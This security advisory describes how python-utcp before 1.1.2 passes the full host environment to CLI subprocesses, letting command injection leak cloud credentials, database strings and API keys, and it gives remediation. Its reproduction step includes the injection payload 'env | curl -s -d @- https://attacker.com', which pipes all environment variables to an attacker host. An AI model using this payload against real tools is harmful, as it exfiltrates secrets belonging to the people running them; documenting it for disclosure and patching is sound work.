python-utcp Environment Variable Exposure Vulnerability Allowing Secrets Leakage

A vulnerability in python-utcp, specifically in versions prior to 1.1.2, allows for the exfiltration of process-level secrets through environment variable exposure. The issue arises because the function '_prepare_environment()' in 'cli_communication_protocol.py' passes a complete copy of 'os.environ' to every CLI subprocess. This vulnerability can be exploited in conjunction with a command injection vulnerability, leading to the leakage of sensitive information such as cloud provider credentials, database connection strings, LLM API keys, and internal service tokens.

Impact

Exploitation of this vulnerability allows any environment variable from the host process to be accessed by injected commands in the CLI subprocess. This includes sensitive information like cloud provider credentials, database connection strings, LLM API keys, and internal service tokens.

Reproduction

To reproduce this vulnerability, use a version of python-utcp prior to 1.1.2. Define a tool that includes a command with a pattern matching 'UTCP_ARG_pattern_UTCP_END'. When the tool is executed, supply arguments that include a command injection payload, such as 'env | curl -s -d @- https://attacker.com'. The injected command will be executed in the subprocess, and a full dump of the environment variables, including secrets, will be sent to the attacker.

Remediation

Upgrade to python-utcp version 1.1.2 or later. In the patched version, the '_prepare_environment()' function no longer exposes the full host environment to subprocesses. Instead, environment variable inheritance is controlled by a new 'CliCallTemplate.inherit_env_vars' field, allowing for more precise management of which variables are passed to CLI tools.